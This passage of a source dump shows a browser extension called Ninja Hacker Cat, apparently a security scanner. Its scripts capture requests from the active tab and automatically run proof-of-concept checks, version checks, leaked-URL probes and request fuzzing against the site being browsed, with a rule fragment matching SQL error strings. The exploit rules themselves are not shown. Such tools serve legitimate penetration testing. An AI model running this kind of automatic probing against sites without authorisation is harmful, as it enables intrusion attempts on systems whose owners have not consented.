[ 20 | "syntax error", 21 | "order by" 22 | ], 23 | tags: ["get-param"], 24 | cat: "cat-love", 25 | critLevel: 2 26 | }] 27 | 28 | -------------------------------------------------------------------------------- /scripts/background.js: -------------------------------------------------------------------------------- 1 | let myWindowId = null 2 | 3 | function nhc_toggleNinjaHackerCat() { 4 | browser.tabs.query({ windowId: myWindowId }) 5 | .then(async tabs => { 6 | let found = false 7 | for (let tab of tabs) { 8 | if (tab.title 9 | && (tab.title == "✔ Active Ninja Hacker Cat" || 10 | tab.title == "💤 Sleeping Ninja Hacker Cat")) { 11 | found = true 12 | } 13 | } 14 | if (!found) { 15 | browser.tabs.create( 16 | { 17 | index: 0, 18 | url: "/panel.html", 19 | active: true 20 | } 21 | ) 22 | browser.browserAction.setIcon({ 23 | path: { 24 | 16: "/images/cat-default.png", 25 | 32: "/images/cat-default.png" 26 | } 27 | }) 28 | } 29 | }) 30 | } 31 | 32 | browser.windows.getCurrent({ populate: true }).then((windowInfo) => { 33 | myWindowId = windowInfo.id 34 | }) 35 | 36 | browser.browserAction.onClicked.addListener(nhc_toggleNinjaHackerCat); -------------------------------------------------------------------------------- /scripts/main.js: -------------------------------------------------------------------------------- 1 | import { leakUrls } from "../rules/leak-urls.js"; 2 | import { poc } from "../rules/poc.js"; 3 | import { web } from "../rules/web.js"; 4 | import { tags } from "../engine/tags.js" 5 | import { fuzzing } from "../rules/fuzzing.js" 6 | import { versions } from "../rules/versions.js" 7 | 8 | import { engine } from "../engine/engine.js" 9 | import { fuzzing_engine } from "../engine/fuzzing.js" 10 | 11 | let myWindowId; 12 | const check_automatically = document.querySelector("#autoRequest") 13 | 14 | // toggle toolbar icons 15 | document.querySelector("#autoRequest") 16 | .addEventListener("click", () => { 17 | console.log(check_automatically) 18 | if (check_automatically.checked) { 19 | // Info: title is used to check if this tab is open 20 | document.title = "✔ Active Ninja Hacker Cat" 21 | browser.browserAction.setIcon({ 22 | path: { 23 | 16: "/images/cat-default.png", 24 | 32: "/images/cat-default.png" 25 | } 26 | }) 27 | document.querySelectorAll(".checkbox-rules").forEach(element => { 28 | element.classList.remove("checkbox-deactivated") 29 | }) 30 | } else { 31 | // Info: title is used to check if this tab is open 32 | document.title = "💤 Sleeping Ninja Hacker Cat" 33 | browser.browserAction.setIcon({ 34 | path: { 35 | 16: "/images/cat-default-grey.png", 36 | 32: "/images/cat-default-grey.png" 37 | } 38 | }) 39 | document.querySelectorAll(".checkbox-rules").forEach(element => { 40 | element.classList.add("checkbox-deactivated") 41 | }) 42 | } 43 | }) 44 | 45 | // global stuff 46 | window.nhc_requestCounter = 0 47 | window.nhc_requestGapTimer = 100 48 | window.nhc_currentCritLevel = 0 49 | window.nhc_requestedUrls = [] 50 | 51 | function main(requestDetails) { 52 | // start checks or skip checks 53 | if (!check_automatically.checked) { 54 | return; 55 | } 56 | 57 | browser.tabs.query({ windowId: myWindowId, active: true }) 58 | .then(async tabs => { 59 | // check if at least 1 tab is active 60 | if (tabs?.length == 0 || !tabs[0].url) { 61 | return; 62 | } 63 | 64 | let active_tab_url = tabs[0].url 65 | let active_domain = new URL(tabs[0].url).hostname 66 | 67 | let current_request_url = requestDetails.url 68 | let current_domain = new URL(requestDetails.url).hostname 69 | 70 | // only check request from current active tab 71 | if (active_domain == current_domain) { 72 | // skip internal about pages 73 | if (active_tab_url.indexOf('about:') !== 0) { 74 | // detect software, version 75 | let detectedTags = await tags(current_request_url) 76 | 77 | // run simple checks based on url 78 | if (document.querySelector("#checkboxWeb").checked) { 79 | engine(web, detectedTags, current_request_url) 80 | } 81 | if (document.querySelector("#checkboxCritPOC").checked) { 82 | engine(poc, detectedTags, current_request_url) 83 | } 84 | if (document.querySelector("#checkboxVersions").checked) { 85 | engine(versions, detectedTags, current_request_url) 86 | } 87 | 88 | // run fuzzing based on current captured request 89 | if (document.querySelector("#checkboxFuzzing").checked) { 90 | fuzzing_engine(fuzzing, requestDetails) 91 | } 92 | 93 | // run simple checks based on url 94 | if (document.querySelector("#checkboxLeaks").checked) { 95 | engine(leakUrls, detectedTags, current_request_url) 96 | } 97 | } 98 | } 99 | }) 100 | } 101 | 102 | // webrequest interception and global buildup to get a full request 103 | const globalRequests = [] 104 | 105 | browser.webRequest.onBeforeRequest.addListener( 106 | request => { 107 | globalRequests[request.requestId] = request 108 | // save body of response 109 | if (request?.requestBody?.raw) { 110 | globalRequests[request.requestId].requestBodyString = decodeURIComponent( 111 | String.fromCharCode.apply(null, 112 | new Uint8Array(request.requestBody.raw[0].bytes)) 113 | ) 114 | } 115 | if (globalRequests[request.requestId].requestBodyString) { 116 | try { 117 | globalRequests[request.requestId].requestBodyJSON = JSON.parse( 118 | globalRequests[request.requestId].requestBodyString 119 | ) 120 | } catch { 121 | console.warn("JSON parser failed: ", request.url) 122 | } 123 | } 124 | console.log(globalRequests[request.requestId]) 125 | }, 126 | { urls: [""] }, 127 | ["requestBody"] 128 | ) 129 | 130 | browser.webRequest.onBeforeSendHeaders.addListener( 131 | request => { 132 | globalRequests[request.requestId].requestHeaders = request.requestHeaders 133 | }, 134 | { urls: [""], types: ["main_frame", "xmlhttprequest"] }, 135 | ["requestHeaders"] 136 | ) 137 | 138 | browser.webRequest.onHeadersReceived.addListener( 139 | request => { 140 | globalRequests[request.requestId].responseHeaders = request.responseHeaders 141 | }, 142 | { urls: [""], types: ["main_frame", "xmlhttprequest"] }, 143 | ["responseHeaders"] 144 | ) 145 | 146 | browser.webRequest.onCompleted.addListener( 147 | request => { 148 | let currentRequest = globalRequests[request.requestId] 149 | // filter my own requests based on header 150 | let cat_header = currentRequest.requestHeaders 151 | .find(header => header.name === "X-Requested-With" 152 | && header.value === "Ninja Hacker Cat") 153 | delete globalRequests[request.requestId]; 154 | if (!cat_header) { 155 | main(currentRequest) 156 | } 157 | }, 158 | { urls: [""], types: ["main_frame", "xmlhttprequest"] } 159 | ) 160 | 161 | // window stuff to query tabs 162 | browser.windows.getCurrent({ populate: true }).then((windowInfo) => { 163 | myWindowId = windowInfo.id 164 | }) 165 | 166 | // show default cat 167 | document.querySelector('#cat-default').style.display = 'block'; 168 | 169 | // reset click event 170 | document.querySelector('#reset').addEventListener('click', () => { 171 | document.querySelectorAll('.avatar').forEach(avatar => { 172 | avatar.style.display = 'none' 173 | }) 174 | document.querySelector('#cat-default').style.display = 'block' 175 | window.nhc_currentCritLevel = 0 176 | window.nhc_requestCounter = 0 177 | window.nhc_requestedUrls = [] 178 | document.querySelector('#messageBox').innerHTML = '' 179 | document.querySelector('#reset').classList.add('hidden') 180 | }) -------------------------------------------------------------------------------- /sounds/miau1.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/sounds/miau1.mp3 -------------------------------------------------------------------------------- /sounds/miau2.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/sounds/miau2.mp3 -------------------------------------------------------------------------------- /trash.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | --------------------------------------------------------------------------------